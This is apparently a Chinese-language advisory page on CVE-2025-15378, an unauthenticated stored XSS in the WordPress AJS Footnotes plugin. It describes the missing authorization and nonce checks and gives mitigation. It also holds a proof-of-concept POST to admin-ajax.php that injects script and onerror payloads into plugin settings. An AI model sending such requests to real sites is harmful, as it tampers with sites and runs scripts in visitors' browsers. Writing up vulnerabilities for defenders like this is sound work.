CVE-2025-15378 CVSS 7.2 高危

CVE-2025-15378 WordPress AJS Footnotes插件存储型XSS漏洞

披露日期: 2026-01-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15378

漏洞类型

存储型XSS

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress AJS Footnotes plugin

漏洞概述

WordPress的AJS Footnotes插件存在存储型跨站脚本(XSS)漏洞，源于缺少权限验证和nonce检查，导致未认证攻击者能修改插件配置并注入恶意脚本到页面。

技术细节

漏洞源于settings保存函数缺乏授权和nonce验证，'note_list_class'和'popup_display_effect_in'参数未充分清理。用户访问受感染页面时恶意脚本自动执行。

攻击链分析

STEP 1

攻击者向admin-ajax.php发送恶意请求

STEP 2

插件在保存设置时未进行权限和nonce验证

STEP 3

恶意脚本被存储到数据库

STEP 4

用户访问包含恶意代码的页面

STEP 5

脚本在用户浏览器中执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=ajs_footnotes_save_settings&note_list_class=<script>alert(document.cookie)</script>&popup_display_effect_in=<img src=x onerror=alert(1)>

影响范围

AJS Footnotes plugin <= 1.0

防御指南

临时缓解措施

暂时禁用AJS Footnotes插件或限制未认证用户访问

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表